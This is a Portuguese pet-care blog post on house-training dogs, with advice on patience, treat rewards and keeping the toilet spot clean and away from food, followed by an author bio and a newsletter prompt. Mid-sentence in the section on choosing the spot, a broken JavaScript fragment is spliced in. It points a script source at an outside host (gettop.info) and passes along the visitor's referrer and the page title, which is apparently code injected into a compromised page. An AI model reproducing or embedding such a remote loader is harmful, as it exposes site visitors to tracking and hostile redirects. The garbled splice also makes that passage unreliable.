Regras e sítio ideal para as necessidades do cão

Nídia Teiga Cães, Comportamento, Dicas para cães 0 Comments

Fonte: 8 Kome

A paciência e o carinho são regras chave para ensinar o seu cão a fazer as necessidades no local certo e deixar a casa limpa e cheirosa.

O local para este fazer as necessidades poderá ser limitado por jornais, tapetes absorventes próprios ou outro material que prefira, mas o importante é que o cão entenda que o sítio é o dono que escolhe e não ele.

Tal como já dissemos a paciência é muito importante para que tudo corra bem, é importante que os donos saibam que os cães não estão habituados a fazer xixi no mesmo sítio, principalmente os machos que têm a necessidade de marcar território.

Sempre que possível tente estar atento ao local onde este irá fazer as suas necessidades e mostre-lhe o sítio certo. Quando ele acertar dê-lhe de imediato um biscoito, pois isto fará com que o cão ou cadela perceba que sempre que agir corretamente ganhará uma recompensa.

Quando os cães ainda são pequenos, há que ter a atenção que estes não tem controlo total na bexiga e por isso os donos terão de ter ainda mais paciência.

Escolha do sítio

Esta escolha deve ser feita com consciência e deve ser um sítio sempre longe da comida, dos brinquedos e da cama pois os cães não gostam de comer ao pé de coisas sujas. Mantenha sempre o mesmo limpo e troque os jornais sempre que o cão fizer xixi ou cócó.footer._s5vm9s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Apaixonada por animais e o seu melhor amigo é o Dallas, um Boxer muito querido e louco para a brincadeira. Blogger e Community Manager da Love Pet Food. Licenciada em Economia na Nova School of Business and Economics e mestre em Marketing pelo ISCTE Business School.

Junte-se a milhares de pet lovers e receba a nossa newsletter patuda.

Todas as semanas enviamos a nossa newsletter cheia de dicas, notícias e videos divertidos. Não perca nada e subscreva!